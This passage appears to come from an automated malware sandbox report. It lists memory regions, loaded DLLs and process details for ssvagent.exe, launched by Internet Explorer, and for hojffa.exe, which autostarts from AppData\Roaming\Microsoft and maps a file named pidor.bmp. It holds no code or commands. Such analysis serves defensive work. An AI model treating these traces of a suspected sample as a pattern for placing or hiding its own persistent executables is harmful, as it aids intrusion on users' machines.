private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x002e0000 0x002fffff Memory Mapped File Readable True False False -
private_0x0000000000300000 0x00300000 0x00301fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000350000 0x00350000 0x0042efff Pagefile Backed Memory Readable True False False -
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006c0000 0x006c0000 0x006c1fff Pagefile Backed Memory Readable True False False -
private_0x00000000006d0000 0x006d0000 0x0074ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000750000 0x00750000 0x008d0fff Pagefile Backed Memory Readable True False False -
index.dat 0x008e0000 0x008ebfff Memory Mapped File Readable, Writable True False False -
private_0x00000000008f0000 0x008f0000 0x009effff Private Memory Readable, Writable True False False -
pagefile_0x00000000009f0000 0x009f0000 0x01deffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01df0000 0x020befff Memory Mapped File Readable False False False -
pagefile_0x00000000020c0000 0x020c0000 0x0212dfff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x02130000 0x02137fff Memory Mapped File Readable, Writable True False False -
index.dat 0x02140000 0x0214ffff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000002150000 0x02150000 0x02150fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002160000 0x02160000 0x0219ffff Private Memory Readable, Writable True False False -
private_0x00000000021a0000 0x021a0000 0x021dffff Private Memory Readable, Writable True False False -
private_0x00000000021e0000 0x021e0000 0x021fffff Private Memory Readable, Writable True False False -
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002300000 0x02300000 0x02300fff Pagefile Backed Memory Readable True False False -
private_0x0000000002310000 0x02310000 0x02311fff Private Memory Readable, Writable True False False -
private_0x0000000002320000 0x02320000 0x0232ffff Private Memory Readable, Writable True False False -
private_0x0000000002360000 0x02360000 0x0245ffff Private Memory Readable, Writable True False False -
private_0x0000000002480000 0x02480000 0x0257ffff Private Memory Readable, Writable True False False -
private_0x00000000025a0000 0x025a0000 0x025dffff Private Memory Readable, Writable True False False -
private_0x0000000002600000 0x02600000 0x0263ffff Private Memory Readable, Writable True False False -
private_0x0000000002640000 0x02640000 0x0273ffff Private Memory Readable, Writable True False False -
private_0x0000000002760000 0x02760000 0x0279ffff Private Memory Readable, Writable True False False -
private_0x00000000027d0000 0x027d0000 0x0280ffff Private Memory Readable, Writable True False False -
private_0x0000000002890000 0x02890000 0x0298ffff Private Memory Readable, Writable True False False -
private_0x00000000029d0000 0x029d0000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002be0000 0x02be0000 0x02c1ffff Private Memory Readable, Writable True False False -
private_0x0000000002c80000 0x02c80000 0x02cbffff Private Memory Readable, Writable True False False -
private_0x0000000002db0000 0x02db0000 0x02eaffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002eb0000 0x02eb0000 0x032a2fff Pagefile Backed Memory Readable True False False -
private_0x00000000032b0000 0x032b0000 0x033affff Private Memory Readable, Writable True False False -
private_0x0000000003450000 0x03450000 0x0354ffff Private Memory Readable, Writable True False False -
private_0x0000000003630000 0x03630000 0x0366ffff Private Memory Readable, Writable True False False -
private_0x0000000003770000 0x03770000 0x037affff Private Memory Readable, Writable True False False -
staticcache.dat 0x037b0000 0x040dffff Memory Mapped File Readable False False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
comctl32.dll 0x71a50000 0x71ad3fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp90.dll 0x71ae0000 0x71b6dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcr90.dll 0x71b70000 0x71c12fff Memory Mapped File Readable, Writable, Executable False False False -
acroiehelpershim.dll 0x71c20000 0x71c30fff Memory Mapped File Readable, Writable, Executable False False False -
mlang.dll 0x71c40000 0x71c6dfff Memory Mapped File Readable, Writable, Executable False False False -
ieframe.dll 0x72e00000 0x7387ffff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x73c10000 0x73c4bfff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x73d60000 0x73dabfff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x73d70000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False -
ieshims.dll 0x73db0000 0x73de4fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x74320000 0x74414fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74430000 0x7443dfff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x744a0000 0x744b2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
ieproxy.dll 0x74a10000 0x74a3afff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74ae0000 0x74b00fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x74c90000 0x74ca1fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75210000 0x7528afff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75290000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75860000 0x75886fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75890000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 43 entries are omitted.
The remaining entries can be found in flog.txt.
Process #15: ssvagent.exe
0 0
»
Information Value
ID #15
File Name c:\progra~2\java\jre7\bin\ssvagent.exe
Command Line "C:\PROGRA~2\Java\jre7\bin\ssvagent.exe" -new
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:39
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xa20
Parent PID 0x49c (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 8DC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0041ffff Private Memory Readable, Writable True False False -
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006e0000 0x006e0000 0x00860fff Pagefile Backed Memory Readable True False False -
private_0x0000000000950000 0x00950000 0x0095ffff Private Memory Readable, Writable True False False -
private_0x0000000000a20000 0x00a20000 0x00a2ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x00a30000 0x00cfefff Memory Mapped File Readable False False False -
private_0x0000000000ed0000 0x00ed0000 0x00f0ffff Private Memory Readable, Writable True False False -
ssvagent.exe 0x01380000 0x0138cfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001390000 0x01390000 0x0278ffff Pagefile Backed Memory Readable True False False -
deploy.dll 0x71710000 0x7176dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x717d0000 0x7188efff Memory Mapped File Readable, Writable, Executable False False False -
jp2ssv.dll 0x71890000 0x718bdfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74290000 0x74298fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
imagehlp.dll 0x74eb0000 0x74ed9fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #25: hojffa.exe
1253 35
»
Information Value
ID #25
File Name c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe
Command Line "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe"
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:03, Reason: Autostart
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:02:17
OS Process Information
»
Information Value
PID 0x7cc
Parent PID 0x7b4 (c:\windows\system32\conhost.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 7D0
0x 7D4
0x 7DC
0x 7E4
0x 7E8
0x 7EC
0x 7F0
0x 7F4
0x 7F8
0x 420
0x 5F0
0x 628
0x 67C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x0005ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00064fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00076fff Pagefile Backed Memory Readable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00091fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000140000 0x00140000 0x00144fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00154fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00160000 0x00160fff Memory Mapped File Readable False False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable True False False -
index.dat 0x00180000 0x0018bfff Memory Mapped File Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0022afff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x00256fff Private Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x0028ffff Private Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x00246fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000250000 0x00250000 0x00250fff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x00260fff Private Memory Readable, Writable, Executable True False False -
index.dat 0x00260000 0x00267fff Memory Mapped File Readable, Writable True True False
index.dat 0x00270000 0x0027ffff Memory Mapped File Readable, Writable True True False
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x00292fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000002a0000 0x002a0000 0x0031ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0035ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00360000 0x0039bfff Memory Mapped File Readable False False False -
private_0x0000000000360000 0x00360000 0x0039ffff Private Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x003a2fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
hojffa.exe 0x00400000 0x00448fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000450000 0x00450000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x004cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004d0000 0x004d0000 0x004d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000004e0000 0x004e0000 0x004e0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d70000 0x01d70000 0x01e6ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01e70000 0x0213efff Memory Mapped File Readable False False False -
pagefile_0x0000000002140000 0x02140000 0x02532fff Pagefile Backed Memory Readable True False False -
private_0x0000000002540000 0x02540000 0x0263ffff Private Memory Readable, Writable True False False -
private_0x0000000002640000 0x02640000 0x0273ffff Private Memory Readable, Writable True False False -
private_0x0000000002640000 0x02640000 0x026cffff Private Memory Readable, Writable True False False -
private_0x0000000002640000 0x02640000 0x0267ffff Private Memory Readable, Writable True False False -
private_0x0000000002700000 0x02700000 0x0273ffff Private Memory Readable, Writable True False False -
private_0x0000000002740000 0x02740000 0x0283ffff Private Memory Readable, Writable True False False -
private_0x0000000002840000 0x02840000 0x0293ffff Private Memory Readable, Writable True False False -
private_0x0000000002940000 0x02940000 0x02a3ffff Private Memory Readable, Writable True False False -
private_0x0000000002a40000 0x02a40000 0x02beffff Private Memory Readable, Writable True False False -
private_0x0000000002a40000 0x02a40000 0x02b3ffff Private Memory Readable, Writable True False False -
private_0x0000000002be0000 0x02be0000 0x02beffff Private Memory Readable, Writable True False False -
private_0x0000000002bf0000 0x02bf0000 0x02ceffff Private Memory Readable, Writable True False False -
private_0x0000000002cf0000 0x02cf0000 0x02deffff Private Memory Readable, Writable True False False -
pidor.bmp 0x03f10000 0x04401fff Memory Mapped File Readable True True False
netprofm.dll 0x73700000 0x73759fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73760000 0x73765fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73770000 0x7377ffff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x73780000 0x7378cfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x73790000 0x737a4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x737b0000 0x73801fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x73890000 0x738a6fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x738b0000 0x738eafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x738f0000 0x73905fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x73910000 0x739cefff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-synch-l1-2-0.dll 0x739d0000 0x739d2fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x73a60000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x73a70000 0x73a90fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75490000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x75590000 0x75592fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x755a0000 0x7562efff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75630000 0x75765fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75790000 0x758acfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75af0000 0x75afbfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75b00000 0x75c5bfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75c60000 0x75ce2fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75d00000 0x75df4fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75e00000 0x76a49fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76a60000 0x76aa4fff Memory Mapped File Readable, Writable, Executable False False False -
